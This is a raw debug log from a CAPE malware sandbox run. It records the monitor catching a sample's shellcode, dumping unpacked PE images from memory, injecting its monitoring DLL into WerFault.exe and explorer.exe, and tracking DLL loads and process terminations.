2019-10-10 02:01:50,352 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,352 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1e0000: 0xe8.
2019-10-10 02:01:50,352 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:50,352 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,352 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x001E0000.
2019-10-10 02:01:50,352 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:50,352 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,352 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:50,352 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1e0000: 0xe8.
2019-10-10 02:01:50,352 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:50,352 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,352 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x001E003C.
2019-10-10 02:01:50,352 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x001E003C).
2019-10-10 02:01:50,368 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,368 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x001E0000.
2019-10-10 02:01:50,368 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,368 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x001E003C.
2019-10-10 02:01:50,368 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x001E003C).
2019-10-10 02:01:50,368 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,368 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x001E0000.
2019-10-10 02:01:50,368 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,368 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x001E003C.
2019-10-10 02:01:50,384 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x001E003C).
2019-10-10 02:01:50,384 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,384 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x001E0000.
2019-10-10 02:01:50,384 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,384 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x001E003C.
2019-10-10 02:01:50,384 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x001E003C).
2019-10-10 02:01:50,384 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,384 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x001E0000.
2019-10-10 02:01:50,384 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x001E0000 (thread 2632)
2019-10-10 02:01:50,400 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x001E0000 (allocation base 0x001E0000).
2019-10-10 02:01:50,400 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x001E0000, size 0x10000).
2019-10-10 02:01:50,400 [root] DEBUG: DumpPEsInRange: Scanning range 0x1e0000 - 0x1f0000.
2019-10-10 02:01:50,400 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1e053f
2019-10-10 02:01:50,400 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:50,400 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x001E053F.
2019-10-10 02:01:50,415 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\2636_18638294885015104102019
2019-10-10 02:01:50,415 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:50,415 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1e073f-0x1f0000.
2019-10-10 02:01:50,415 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:50,415 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1e0000 - 0x1f0000.
2019-10-10 02:01:50,415 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x001E0000.
2019-10-10 02:01:50,415 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x001E003C.
2019-10-10 02:01:50,415 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x001E0000.
2019-10-10 02:01:50,415 [root] DEBUG: set_caller_info: Adding region at 0x001E0000 to caller regions list.
2019-10-10 02:01:50,430 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.270750e+00
2019-10-10 02:01:50,430 [root] DEBUG: AddTrackedRegion: Region at 0x00270000 size 0xe200 added to tracked regions.
2019-10-10 02:01:50,430 [root] DEBUG: ProtectionHandler: Address: 0x00271000 (alloc base 0x00270000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:50,430 [root] DEBUG: ProtectionHandler: New code detected at (0x00270000), scanning for PE images.
2019-10-10 02:01:50,430 [root] DEBUG: DumpPEsInRange: Scanning range 0x270000 - 0x27e200.
2019-10-10 02:01:50,430 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x270000
2019-10-10 02:01:50,430 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00270000
2019-10-10 02:01:50,430 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:50,430 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00270000.
2019-10-10 02:01:50,447 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:50,447 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\2636_3825883625011104102019
2019-10-10 02:01:50,447 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:50,447 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x270200-0x27e200.
2019-10-10 02:01:50,447 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:50,447 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x00270000.
2019-10-10 02:01:50,461 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:50,461 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x270000 - 0x27e200.
2019-10-10 02:01:50,461 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 1788 at 0x00000000741B0000, image base 0x00000000FFA10000, stack from 0x0000000000135000-0x0000000000140000
2019-10-10 02:01:50,461 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k WerSvcGroup.
2019-10-10 02:01:50,461 [root] DEBUG: set_caller_info: Adding region at 0x00270000 to caller regions list.
2019-10-10 02:01:50,461 [root] DEBUG: AddTrackedRegion: EntryPoint 0x246c, Entropy 3.647981e+00
2019-10-10 02:01:50,461 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2019-10-10 02:01:50,477 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:50,477 [root] INFO: Added new process to list with pid: 1788
2019-10-10 02:01:50,477 [root] INFO: Monitor successfully loaded in process with pid 1788.
2019-10-10 02:01:50,509 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2672.
2019-10-10 02:01:50,509 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:50,509 [root] DEBUG: DLL unloaded from 0x000007FEFC4C0000.
2019-10-10 02:01:50,509 [root] DEBUG: DLL loaded at 0x000007FEF5700000: c:\windows\system32\wersvc (0x18000 bytes).
2019-10-10 02:01:50,509 [root] DEBUG: DLL unloaded from 0x000007FEF5700000.
2019-10-10 02:01:50,525 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1124.
2019-10-10 02:01:50,539 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:50,539 [root] DEBUG: DLL unloaded from 0x000007FEF5700000.
2019-10-10 02:01:50,572 [root] DEBUG: DLL loaded at 0x000007FEF2D80000: C:\Windows\System32\faultrep (0x5c000 bytes).
2019-10-10 02:01:50,650 [root] DEBUG: DLL loaded at 0x000007FEF8CA0000: C:\Windows\System32\wer (0x7c000 bytes).
2019-10-10 02:01:50,680 [root] DEBUG: DLL unloaded from 0x000007FEF8CA0000.
2019-10-10 02:01:50,727 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 02:01:50,727 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\System32\profapi (0xf000 bytes).
2019-10-10 02:01:50,727 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\System32\USERENV (0x1e000 bytes).
2019-10-10 02:01:50,743 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 02:01:50,773 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-10-10 02:01:50,773 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 2108
2019-10-10 02:01:50,773 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 416
2019-10-10 02:01:50,773 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:50,773 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:50,789 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:50,789 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:50,789 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:50,789 [root] DEBUG: Loader: Injecting process 2108 (thread 2100) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,789 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:50,789 [root] DEBUG: Process image base: 0x00000000FFD90000
2019-10-10 02:01:50,789 [root] DEBUG: Loader: Injecting process 416 (thread 948) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,789 [root] DEBUG: Process image base: 0x00000000FFD90000
2019-10-10 02:01:50,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,789 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFDF9000 - 0x000007FEFF430000
2019-10-10 02:01:50,805 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFDF9000 - 0x000007FEFF430000
2019-10-10 02:01:50,805 [root] DEBUG: InjectDllViaIAT: Allocated 0x260 bytes for new import table at 0x00000000FFE00000.
2019-10-10 02:01:50,805 [root] DEBUG: InjectDllViaIAT: Allocated 0x260 bytes for new import table at 0x00000000FFE00000.
2019-10-10 02:01:50,805 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:50,805 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:50,805 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,805 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,805 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2108
2019-10-10 02:01:50,805 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 416
2019-10-10 02:01:50,805 [root] DEBUG: DLL unloaded from 0x000007FEF2D80000.
2019-10-10 02:01:50,805 [root] DEBUG: DLL unloaded from 0x000007FEF2D80000.
2019-10-10 02:01:50,836 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:50,836 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:50,836 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:50,836 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:50,836 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:50,836 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:50,836 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:50,851 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:50,851 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:50,851 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:50,851 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:50,851 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:50,851 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:50,851 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:50,851 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 2108 at 0x00000000741B0000, image base 0x00000000FFD90000, stack from 0x0000000000295000-0x00000000002A0000
2019-10-10 02:01:50,851 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 416 at 0x00000000741B0000, image base 0x00000000FFD90000, stack from 0x0000000000175000-0x0000000000180000
2019-10-10 02:01:50,851 [root] DEBUG: Commandline: C:\Windows\sysnative\WerFault.exe -u -p 1632 -s 3272.
2019-10-10 02:01:50,851 [root] DEBUG: Commandline: C:\Windows\sysnative\WerFault.exe -u -p 1632 -s 3060.
2019-10-10 02:01:50,868 [root] DEBUG: AddTrackedRegion: EntryPoint 0x44920, Entropy 6.377088e+00
2019-10-10 02:01:50,868 [root] DEBUG: AddTrackedRegion: EntryPoint 0x44920, Entropy 6.377088e+00
2019-10-10 02:01:50,868 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFD90000 size 0x1000 added to tracked regions.
2019-10-10 02:01:50,868 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFD90000 size 0x1000 added to tracked regions.
2019-10-10 02:01:50,868 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:50,884 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:50,884 [root] INFO: Added new process to list with pid: 416
2019-10-10 02:01:50,884 [root] INFO: Monitor successfully loaded in process with pid 416.
2019-10-10 02:01:50,884 [root] INFO: Added new process to list with pid: 2108
2019-10-10 02:01:50,884 [root] INFO: Monitor successfully loaded in process with pid 2108.
2019-10-10 02:01:50,961 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 02:01:50,961 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 02:01:50,993 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:50,993 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:50,993 [root] DEBUG: DLL unloaded from 0x00000000772D0000.
2019-10-10 02:01:50,993 [root] DEBUG: DLL unloaded from 0x00000000772D0000.
2019-10-10 02:01:51,007 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2272.
2019-10-10 02:01:51,007 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:51,007 [root] DEBUG: DLL unloaded from 0x000007FEF2D20000.
2019-10-10 02:01:51,023 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2108).
2019-10-10 02:01:51,039 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2108).
2019-10-10 02:01:51,039 [root] INFO: Notified of termination of process with pid 2108.
2019-10-10 02:01:51,085 [root] INFO: Process with pid 1436 has terminated
2019-10-10 02:01:51,085 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1788).
2019-10-10 02:01:51,085 [root] INFO: Process with pid 2128 has terminated
2019-10-10 02:01:51,085 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2672.
2019-10-10 02:01:51,085 [root] INFO: Process with pid 2108 has terminated
2019-10-10 02:01:51,118 [root] INFO: Notified of termination of process with pid 1632.
2019-10-10 02:01:51,476 [root] DEBUG: DLL loaded at 0x000007FEF7CF0000: C:\Windows\system32\dbgeng (0x374000 bytes).
2019-10-10 02:01:51,492 [root] DEBUG: DLL loaded at 0x000007FEF4360000: C:\Windows\system32\dbghelp (0x125000 bytes).
2019-10-10 02:01:51,617 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:01:51,664 [root] INFO: Announced 64-bit process name: explorer.exe pid: 2916
2019-10-10 02:01:51,664 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:51,664 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:51,683 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:51,686 [root] DEBUG: Loader: Injecting process 2916 (thread 1368) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:51,688 [root] DEBUG: Process image base: 0x00000000FFF70000
2019-10-10 02:01:51,688 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 02:01:51,688 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 02:01:51,698 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:51,698 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:51,709 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:51,719 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:51,719 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:51,719 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:51,729 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 2916 at 0x00000000741B0000, image base 0x00000000FFF70000, stack from 0x0000000004E52000-0x0000000004E60000
2019-10-10 02:01:51,729 [root] DEBUG: Commandline: C:\Windows\sysnative\explorer.exe.
2019-10-10 02:01:51,739 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2b790, Entropy 5.858631e+00
2019-10-10 02:01:51,739 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFF70000 size 0x1000 added to tracked regions.
2019-10-10 02:01:51,739 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:51,749 [root] INFO: Added new process to list with pid: 2916
2019-10-10 02:01:51,749 [root] INFO: Monitor successfully loaded in process with pid 2916.
2019-10-10 02:01:51,749 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 02:01:51,749 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 02:01:51,759 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:51,759 [root] DEBUG: DLL unloaded from 0x000007FEFB970000.
2019-10-10 02:01:52,088 [root] INFO: Process with pid 1632 has terminated
2019-10-10 02:01:52,569 [root] DEBUG: DLL loaded at 0x000007FEFA990000: C:\Windows\system32\SensApi (0x9000 bytes).
2019-10-10 02:01:52,726 [root] DEBUG: DLL loaded at 0x000007FEFA740000: C:\Windows\system32\werui (0x2d000 bytes).
2019-10-10 02:01:52,789 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:01:52,789 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2132.
2019-10-10 02:01:52,789 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:52,803 [root] DEBUG: DLL loaded at 0x000007FEFA770000: C:\Windows\system32\DUI70 (0xf2000 bytes).
2019-10-10 02:01:52,835 [root] DEBUG: DLL loaded at 0x000007FEFBDC0000: C:\Windows\system32\DUser (0x43000 bytes).
2019-10-10 02:01:52,851 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1260.
2019-10-10 02:01:52,851 [root] DEBUG: DLL loaded at 0x000007FEF75E0000: C:\Windows\system32\RICHED20 (0x9e000 bytes).
2019-10-10 02:01:52,914 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 02:01:53,148 [root] DEBUG: DLL loaded at 0x000007FEFB7C0000: C:\Windows\system32\UxTheme (0x56000 bytes).
2019-10-10 02:01:53,163 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 02:01:53,178 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:53,178 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 02:01:53,178 [root] DEBUG: DLL unloaded from 0x000007FEFBDC0000.
2019-10-10 02:01:53,194 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 02:01:53,194 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:53,194 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2240.
2019-10-10 02:01:53,194 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2832.
2019-10-10 02:01:53,194 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 02:01:53,194 [root] DEBUG: DLL unloaded from 0x000007FEFBDC0000.
2019-10-10 02:01:53,210 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 02:01:53,210 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:56,532 [root] DEBUG: DLL loaded at 0x000007FEF9680000: C:\Windows\system32\stobject (0x43000 bytes).
2019-10-10 02:01:56,532 [root] DEBUG: DLL loaded at 0x000007FEF69F0000: C:\Windows\system32\BatMeter (0xba000 bytes).
2019-10-10 02:01:56,595 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2376.
2019-10-10 02:01:56,595 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:56,611 [root] DEBUG: DLL loaded at 0x000007FEFAFA0000: C:\Windows\system32\WTSAPI32 (0x11000 bytes).
2019-10-10 02:01:56,641 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-10-10 02:01:56,657 [root] DEBUG: DLL loaded at 0x000007FEF6980000: C:\Windows\system32\prnfldr (0x69000 bytes).
2019-10-10 02:01:56,673 [root] DEBUG: DLL loaded at 0x000007FEF8A20000: C:\Windows\system32\WINSPOOL.DRV (0x71000 bytes).
2019-10-10 02:01:56,750 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2292.
2019-10-10 02:01:56,859 [root] DEBUG: CreateThread: Initialising breakpoints for thread 764.
2019-10-10 02:01:56,859 [root] DEBUG: Allocation: 0x0000000003D90000 - 0x0000000003D91000, size: 0x1000, protection: 0x40.
2019-10-10 02:01:56,875 [root] DEBUG: AddTrackedRegion: Region at 0x0000000003D90000 size 0x1000 added to tracked regions.
2019-10-10 02:01:56,970 [root] DEBUG: DLL loaded at 0x000007FEF6900000: C:\Windows\system32\dxp (0x74000 bytes).
2019-10-10 02:01:56,984 [root] DEBUG: DLL loaded at 0x000007FEFEB00000: C:\Windows\system32\urlmon (0x178000 bytes).
2019-10-10 02:01:56,984 [root] DEBUG: DLL loaded at 0x000007FEFEC80000: C:\Windows\system32\WININET (0x12a000 bytes).
2019-10-10 02:01:56,984 [root] DEBUG: DLL loaded at 0x000007FEFF1C0000: C:\Windows\system32\iertutil (0x259000 bytes).
2019-10-10 02:01:57,032 [root] DEBUG: DLL loaded at 0x000007FEF8730000: C:\Windows\system32\Syncreg (0x16000 bytes).
2019-10-10 02:01:57,032 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8730000 to caller regions list.
2019-10-10 02:01:57,187 [root] DEBUG: DLL loaded at 0x000007FEFA890000: C:\Windows\ehome\ehSSO (0xb000 bytes).
2019-10-10 02:01:57,187 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA890000 to caller regions list.
2019-10-10 02:01:57,187 [root] DEBUG: DLL unloaded from 0x000007FEFA890000.
2019-10-10 02:01:57,296 [root] DEBUG: DLL loaded at 0x000007FEF6F60000: C:\Windows\System32\netshell (0x28b000 bytes).
2019-10-10 02:01:57,312 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\System32\IPHLPAPI (0x27000 bytes).
2019-10-10 02:01:57,312 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-10-10 02:01:57,312 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\System32\WINNSI (0xb000 bytes).
2019-10-10 02:01:57,312 [root] DEBUG: DLL loaded at 0x000007FEFB300000: C:\Windows\System32\nlaapi (0x15000 bytes).
2019-10-10 02:01:57,328 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAED0000 to caller regions list.
2019-10-10 02:01:57,328 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAF10000 to caller regions list.
2019-10-10 02:01:57,344 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB300000 to caller regions list.
2019-10-10 02:01:57,359 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6F60000 to caller regions list.
2019-10-10 02:01:57,405 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1204.
2019-10-10 02:01:57,405 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:57,405 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 02:01:57,516 [root] DEBUG: DLL loaded at 0x000007FEFA540000: C:\Windows\System32\AltTab (0x10000 bytes).
2019-10-10 02:01:57,516 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA540000 to caller regions list.
2019-10-10 02:01:57,516 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1064.
2019-10-10 02:01:57,530 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:57,625 [root] DEBUG: DLL loaded at 0x000007FEF8710000: C:\Windows\system32\wpdshserviceobj (0x20000 bytes).
2019-10-10 02:01:57,625 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8710000 to caller regions list.
2019-10-10 02:01:57,625 [root] DEBUG: DLL loaded at 0x000007FEF68C0000: C:\Windows\system32\PortableDeviceTypes (0x39000 bytes).
2019-10-10 02:01:57,640 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF68C0000 to caller regions list.
2019-10-10 02:01:57,640 [root] DEBUG: DLL loaded at 0x000007FEF91F0000: C:\Windows\system32\PortableDeviceApi (0xbd000 bytes).
2019-10-10 02:01:57,655 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF91F0000 to caller regions list.
2019-10-10 02:01:57,733 [root] DEBUG: DLL loaded at 0x000007FEF6700000: C:\Windows\System32\pnidui (0x1bd000 bytes).
2019-10-10 02:01:57,733 [root] DEBUG: DLL loaded at 0x000007FEF77D0000: C:\Windows\System32\QUtil (0x1f000 bytes).
2019-10-10 02:01:57,733 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\System32\wevtapi (0x6d000 bytes).
2019-10-10 02:01:57,750 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCB00000 to caller regions list.
2019-10-10 02:01:57,765 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF77D0000 to caller regions list.
2019-10-10 02:01:57,765 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6700000 to caller regions list.
2019-10-10 02:01:57,765 [root] DEBUG: DLL unloaded from 0x000007FEFB9C0000.
2019-10-10 02:01:57,765 [root] DEBUG: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\WINTRUST (0x3a000 bytes).
2019-10-10 02:01:57,780 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFD360000 to caller regions list.
2019-10-10 02:01:57,812 [root] DEBUG: DLL loaded at 0x000007FEFEAE0000: C:\Windows\system32\imagehlp (0x17000 bytes).
2019-10-10 02:01:57,828 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFEAE0000 to caller regions list.
2019-10-10 02:01:57,828 [root] DEBUG: DLL loaded at 0x000007FEF57C0000: C:\Windows\system32\mssprxy (0x1d000 bytes).
2019-10-10 02:01:57,842 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF57C0000 to caller regions list.
2019-10-10 02:01:57,842 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
